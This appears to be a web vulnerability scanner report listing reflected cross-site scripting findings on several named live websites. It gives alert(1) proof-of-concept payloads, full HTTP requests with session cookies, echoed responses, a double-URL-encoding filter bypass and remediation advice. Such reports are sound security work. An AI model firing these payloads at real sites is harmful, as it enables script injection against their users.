The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2bc1"-alert(1)-"492761e65ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /od2bc1"-alert(1)-"492761e65ec/8001/p/salsa/website/labs/ HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17b9f"-alert(1)-"154cd4038ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p17b9f"-alert(1)-"154cd4038ad/salsa/website/labs/ HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... vascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80a5"-alert(1)-"a7f7679dbe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oe80a5"-alert(1)-"a7f7679dbe8/8001/p/salsa/website/labs/img/favicon.ico HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2795"-alert(1)-"3186fbadb7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/pb2795"-alert(1)-"3186fbadb7e/salsa/website/labs/img/favicon.ico HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... vascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5413"-alert(1)-"2568c09e6eb was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p/salsa/website/labs/img/favicon.icoc5413"-alert(1)-"2568c09e6eb HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95f48"-alert(1)-"9e6d2606619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /95f48"-alert(1)-"9e6d2606619/hq/css/custom.css HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Referer: https://www.salsalabs.com/dia/hq/sso/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ecf"-alert(1)-"bf4e2d5f0b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f7ecf"-alert(1)-"bf4e2d5f0b7/hq/sso/ HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Referer: http://www.salsalabs.com/o/8001/p/salsa/website/labs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89371"-alert(1)-"db10ed2c3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico89371"-alert(1)-"db10ed2c3c4 HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... ript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed2be"%3balert(1)//3e04ad354f9 was submitted in the c parameter. This input was echoed as ed2be";alert(1)//3e04ad354f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41b40"%3balert(1)//971f44b87cd was submitted in the c parameter. This input was echoed as 41b40";alert(1)//971f44b87cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 873a5%253cscript%253ealert%25281%2529%253c%252fscript%253ef27de3394b7 was submitted in the REST URL parameter 1. This input was echoed as 873a5<script>alert(1)</script>f27de3394b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 File Not Found Date: Fri, 22 Apr 2011 15:22:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 592
<html> <head> <title>404 File Not Found</title> </head> <body> <H1>404 File Not Found</H1> <br><br><br><br> Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico873a5<script>alert(1)</script>f27de3394b7<br> ...[SNIP]...
3.185. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swiftpage1.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bbbe9<script>alert(1)</script>e263f3ff8a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload ce345<script>alert(1)</script>25f446fe2ba was submitted in the path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/scripts/sifr_init_js.aspx?path=/resources/ce345<script>alert(1)</script>25f446fe2ba HTTP/1.1 Host: www.ubi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 9470d<script>alert(1)</script>3c4a6bfe622 was submitted in the path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/ubi_stylesheet_png.aspx?path=/resources/9470d<script>alert(1)</script>3c4a6bfe622 HTTP/1.1 Host: www.ubi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm
This file supports the use of PNG files. Since IE6 requires PNG's to be absolutely specified, this file will programatically add the correct information to the ...[SNIP]... */
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a87"%3balert(1)//2fec8277eb7 was submitted in the Referer HTTP header. This input was echoed as f6a87";alert(1)//2fec8277eb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ebfcd<script>alert(1)</script>23b35df6fea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload e05ad<script>alert(1)</script>be5d4d0f272 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5e65'><script>alert(1)</script>f275fdc8f15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dia/hq/css/custom.css HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... <a href='http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15'> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aecea<script>alert(1)</script>73d9521b5ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dia/hq/css/custom.css HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... </script>73d9521b5ce'>http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce</a> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 7db98<script>alert(1)</script>5eea73835cc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /favicon.ico HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990 Referer: http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... </script>5eea73835cc'>http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc</a> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 889b4'><script>alert(1)</script>d9052bed70a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /favicon.ico HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990 Referer: http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... <a href='http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a'> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload db55a<script>alert(1)</script>474f814857b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... </script>474f814857b'>http://www.google.com/search?hl=en&q=db55a<script>alert(1)</script>474f814857b</a> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3385'><script>alert(1)</script>af1a8e2a429 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... <a href='http://www.google.com/search?hl=en&q=d3385'><script>alert(1)</script>af1a8e2a429'> ...[SNIP]...
3.197. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.force.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ebaef<script>alert(1)</script>ea50eb48de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1">http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1</a>
3.198. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.force.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e1f"><script>alert(1)</script>ca65c1d65e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1">http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1</a>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e75d<script>alert(1)</script>165d6b47824 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found Location: http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824 Content-Type: text/html Content-Length: 262
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824">http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7e06"><script>alert(1)</script>1c75dad300f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found Location: http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f Content-Type: text/html Content-Length: 266
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f">http://mrnumber.com/favicon.ic ...[SNIP]...
3.201. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mrnumber.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bd8"><script>alert(1)</script>35e978e613 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found Location: http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1 Content-Type: text/html Content-Length: 270
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?86bd8"><script>alert(1)</script>35e978e613=1">http://mrnumber.com/favicon. ...[SNIP]...
